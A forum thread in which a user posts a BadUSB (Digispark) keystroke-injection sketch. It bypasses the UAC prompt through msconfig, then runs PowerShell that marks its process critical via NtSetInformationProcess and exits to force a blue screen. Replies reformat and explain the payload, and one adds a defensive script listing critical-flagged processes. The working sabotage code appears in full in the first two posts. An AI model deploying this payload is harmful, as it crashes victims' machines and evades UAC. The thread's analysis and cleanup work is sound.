# Malicious scripts

8 messages · Page 1 of 1 (latest)

pulsar harness

I found a malicious script that is obfuscated. It is using my system resources and I need help figuring out how to remove it. I think a good start is where the DLL is that it created, because it appears to be doing that.

```cpp
#include "DigiKeyboard.h"
#define KEY_DOWN 0x51
void setup() {
  pinMode(1, OUTPUT); //LED on Model A 
}
void loop() {
   
  DigiKeyboard.update();
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(3000);
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); //run
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("msconfig -5"); //starting msconfig
  DigiKeyboard.delay(1000);
  for(int bii =0; bii < 14; bii++)
    {
      DigiKeyboard.sendKeyStroke(KEY_DOWN);
    } 
  DigiKeyboard.sendKeyStroke(KEY_L, MOD_ALT_LEFT); //bypassing UAC
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("powershell"); //starting powershell
  DigiKeyboard.delay(1000);
  DigiKeyboard.println(F("$F=NEW-OBJECT SYSTEM.REFLECTION.ASSEMBLYNAME('BS');$B=[APPDOMAIN]::CURRENTDOMAIN.DEFINEDYNAMICASSEMBLY($F,[REFLECTION.EMIT.ASSEMBLYBUILDERACCESS]::RUN);$C=$B.DEFINEDYNAMICMODULE('BS', $FALSE);$E=$C.DEFINETYPE('BS.WIN32.NTDLL', 'PUBLIC, CLASS');$D=$E.DEFINEPINVOKEMETHOD('NtSetInformationProcess', 'NTDLL.DLL',([REFLECTION.METHODATTRIBUTES]'PUBLIC, STATIC'),[REFLECTION.CALLINGCONVENTIONS]::STANDARD,[INT32],[TYPE[]]@([INTPTR],[UINT32],[INTPTR].MAKEBYREFTYPE(),[UINT32]),[RUNTIME.INTEROPSERVICES.CALLINGCONVENTION]::WINAPI,[RUNTIME.INTEROPSERVICES.CHARSET]::AUTO);$J=$E.CREATETYPE();$H=[DIAGNOSTICS.PROCESS]::GETCURRENTPROCESS().HANDLE;$I=[SYSTEM.RUNTIME.INTEROPSERVICES.MARSHAL]::ALLOCHGLOBAL(4);$A=29;$G=4;$NULL=$J::NtSetInformationProcess($H, $A,[REF]$I, $G);")); //adding mayhem
  DigiKeyboard.println("exit"); //killing the critical process and BSOD
}
```
cedar marten

The only way to be 100% sure is to reinstall windows.

For anyone else viewing this, this is just the PS bit:

```powershell
$F = New-Object SYSTEM.REFLECTION.ASSEMBLYNAME('BS')
$B = [APPDOMAIN]::CURRENTDOMAIN.DEFINEDYNAMICASSEMBLY($F, [REFLECTION.EMIT.ASSEMBLYBUILDERACCESS]::RUN)
$C = $B.DEFINEDYNAMICMODULE('BS', $FALSE)
$E = $C.DEFINETYPE('BS.WIN32.NTDLL', 'PUBLIC, CLASS')
$D = $E.DEFINEPINVOKEMETHOD('NtSetInformationProcess', 'NTDLL.DLL', ([REFLECTION.METHODATTRIBUTES]'PUBLIC, STATIC'), [REFLECTION.CALLINGCONVENTIONS]::STANDARD, [INT32], [TYPE[]]@([INTPTR], [UINT32], [INTPTR].MAKEBYREFTYPE(), [UINT32]), [RUNTIME.INTEROPSERVICES.CALLINGCONVENTION]::WINAPI, [RUNTIME.INTEROPSERVICES.CHARSET]::AUTO)
$J = $E.CREATETYPE()
$H = [DIAGNOSTICS.PROCESS]::GETCURRENTPROCESS().HANDLE
$I = [SYSTEM.RUNTIME.INTEROPSERVICES.MARSHAL]::ALLOCHGLOBAL(4)
$A = 29
$G = 4
$NULL = $J::NtSetInformationProcess($H, $A, [REF]$I, $G)
```
cursive shard

Looks like anti-RE/diagnostics deterrence, or just intentional sabotage - the msconfig bit is just UI automation to launch cmd.exe without a UAC prompt, from which it launches powershell, and the powershell script basically injects its hosting process with a flag that (as the original source code comment suggests) will cause a system bugcheck when terminated. Could be a decoy or a "dangling sentinel" for something else launched by the same process - if an EDR or other management agent kills the parent process tree the system BSODs immediately.
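
The practical question for anyone cleaning this up is which processes currently carry that flag, so that nothing critical gets killed by accident while the rest of the process tree is removed. The following is an added example, not code from the thread: it queries the same information class the script sets (ProcessBreakOnTermination, value 29) with NtQueryInformationProcess instead of NtSetInformationProcess, and lists every process for which the flag is nonzero. It assumes an elevated PowerShell session (otherwise handles to other users' processes cannot be opened) and that NtQueryInformationProcess is reachable through Add-Type P/Invoke, which it is on stock Windows. The type name `NtCheck` and the function name `Get-CriticalProcess` are the example's own.

```powershell
# Added example: enumerate processes flagged BreakOnTermination ("critical").
# Run from an elevated PowerShell prompt. Core Windows processes such as
# csrss.exe and wininit.exe are legitimately critical and will also appear;
# a user-launched powershell.exe or cmd.exe in this list is the one to worry about.
$src = @"
using System;
using System.Runtime.InteropServices;
public static class NtCheck {
    [DllImport("ntdll.dll")]
    public static extern int NtQueryInformationProcess(
        IntPtr ProcessHandle, int ProcessInformationClass,
        out int ProcessInformation, int ProcessInformationLength,
        out int ReturnLength);
}
"@
Add-Type -TypeDefinition $src

# Same information class the script in this thread uses ($A = 29).
$ProcessBreakOnTermination = 29

function Get-CriticalProcess {
    foreach ($p in Get-Process) {
        try {
            # .Handle opens the process for query access; this throws for
            # protected processes and for processes we lack rights on, so skip those.
            $h = $p.Handle
        } catch { continue }

        $flag = 0
        $len  = 0
        $status = [NtCheck]::NtQueryInformationProcess(
            $h, $ProcessBreakOnTermination, [ref]$flag, 4, [ref]$len)

        # STATUS_SUCCESS is 0; a nonzero flag means the OS will bugcheck if this process exits.
        if ($status -eq 0 -and $flag -ne 0) {
            [pscustomobject]@{
                Id                 = $p.Id
                Name               = $p.ProcessName
                Path               = $p.Path
                BreakOnTermination = $true
            }
        }
    }
}

Get-CriticalProcess | Format-Table -AutoSize
```

Anything that shows up here and is not a core system binary should be handled by clearing the flag (the reverse of what the script does) or by rebooting, never by ending the process outright, since terminating it triggers exactly the bugcheck described above. This is also a useful pre-check before letting an EDR or a cleanup script kill a suspicious process tree on a live machine.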

long kiln

Yep, it was spawning a new PowerShell process that marked itself as critical and then exited. Once a critical process ends, Windows will BSOD.
